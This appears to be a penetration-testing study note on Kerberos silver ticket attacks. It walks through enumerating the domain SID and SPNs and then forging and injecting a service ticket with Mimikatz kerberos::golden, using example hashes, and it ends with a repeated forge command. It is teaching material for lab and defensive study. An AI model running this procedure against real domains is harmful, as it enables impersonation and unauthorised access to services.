5. Silver Tickets

• Ability to access SPN as anyone if owns hash of any account of that SPN
• Application checks user permissions in service ticket, but are often not verified by anything
• It trusts the integrity since the ticket is encrypted with the password hash
• Forging these tickets can be prevented with Privileged Account Certificate (PAC) validation. However, it is rare.
• Using an account password or NTLM hash a ticket can be created to access the application on all servers with the same SPN
• Information needed to forge a silver ticket:
  • SPN password hash
  • Domain SID
  • Target SPN

Forging a silver ticket with Mimikatz:

1. Get NTLM hash in some way.
2. Enumerate domain SID:

whoami /user

• Result: corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105

3. Get SPN:

#Using setspn.exe:
setspn -L <user>

#Using PowerView:
Get-NetUser -SPN | select samaccountname,serviceprincipalname

4. Craft ticket:

#Run mimikatz:
.\mimikatz.exe

#Engage debug mode:
privilege::debug

#Craft ticket:
kerberos::golden /sid:<sid> /domain:<domain> /ptt /target:<hostname> /service:<service> /rc4:<ntlm> /user:<targetuser>

#Example:
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

5. Confirm ticket is loaded in to memory in Powershell:

klist

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:08d7a47a6f9f66b97b1bae4178747494 /user:iis_service